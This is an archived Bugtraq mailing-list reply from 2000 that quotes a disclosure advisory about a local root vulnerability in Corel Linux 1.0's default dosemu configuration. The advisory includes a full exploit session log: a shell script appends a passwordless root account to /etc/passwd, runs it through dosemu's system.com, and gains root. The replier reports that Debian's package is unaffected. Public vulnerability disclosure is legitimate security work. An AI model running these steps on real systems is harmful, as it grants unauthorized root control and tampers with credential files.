[14188] in bugtraq
Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
daemon@ATHENA.MIT.EDU (Seth R Arnold)
Tue Mar 7 08:51:43 2000
Mail-Followup-To: suid@SUID.KG, BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <20000303103351.G10971@willamette.edu>
Date: Fri, 3 Mar 2000 10:33:51 -0800
Reply-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
From: Seth R Arnold <sarnold@WILLAMETTE.EDU>
X-To: suid@SUID.KG
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200003020436.PAA20168@jawa.chilli.net.au>; from suid@SUID.KG on
Thu, Mar 02, 2000 at 04:47:11AM +0000
I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and
did not get these results. It seems the debian maintainer (Herbert Xu)
Did The Right Thing in the config file.
:)
* suid@SUID.KG <suid@SUID.KG> [000303 10:28]:
> Re all,
>
> Hadn't seen this one around yet, has been on my site for about a week now.
>
> Corel's mailserver bounced me about this IIRC? Whats up Corel?
>
> Cheers.
>
> ----------------------------
>
> suid@suid.kg - Corel Linux dosemu config error. Local root compromise.
>
> Software: Corel Linux 1.0 dosemu distribution configuration
> URL: http://linux.corel.com
> Version: Version 1.0
> Platforms: Corel Linux only.
> Type: Default misconfiguration. Noone reads README anymore??
>
> Summary:
>
> Local users can take advantage of a packaging and configuration
> error (which has been known and documented for a long time) to
> execute arbitrary commands as root.
>
> We see from the doc/README/SECURITY file as well as
> http://www.dosemu.org/docs/README/0.98/README-3.html
> written in 1997 that this configuration is bad.
>
> Vulnerability:
>
> The system.com command is available to any user who runs the
> dos emulator. This is a direct violation of the advice from
> the SECURITY readme file:
>
> Never allow the 'system.com' command (part of dosemu)
> to be executed. It makes dosemu
> execute the libc 'system() function'. Though privileges
> are turned off, the process inherits the
> switched uid-setting (uid=root, euid=user), hence the
> unix process can use setreuid to gain root
> access back. ... the rest you can imagine your self.
>
> Exploit:
>
> This is a script log which details how to reproduce this:
>
>
> Script started on Fri Feb 25 13:54:00 2000
> nebula:~$ id
> uid=1000(suid) gid=1000(suid) groups=1000(suid)
> nebula:~$ cat > hack-corel
> #!/bin/bash
> echo "owned::0:0::/:/bin/bash" >> /etc/passwd
> ^D
> nebula:~$ chmod a+rx hack-corel
> nebula:~$ export PATH="$PATH:."
> nebula:~$ dos
> CPU speed set to 430/1 MHz
> Running on CPU=586, FPU=1, rdtsc=1
>
> [ snip bunch of dosemu crap ]
>
> "Welcome to dosemu 0.98!
> C:\> system hack-corel;
> sh: : command not found
> C:\> exitERROR: general protection at 0x3f0ff: 0
> ERROR: SIGSEGV, protected insn...exiting!
>
> nebula:~$ tail -1 /etc/passwd
> owned::0:0::/:/bin/bash
> nebula:~$ su owned
> nebula:/home/suid# id
> uid=0(root) gid=0(root) groups=0(root)
> nebula:/home/suid# exit
> exit
> nebula:~$ exit
>
> Script done on Fri Feb 25 13:55:27 2000
>
> Note:
> This is not a vulnerability in dosemu itself. The documentation
> warns users very specifically that this will happen if the system
> is configured as such.
>
> Greets:
>
> duke
> cr
> active
>
--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
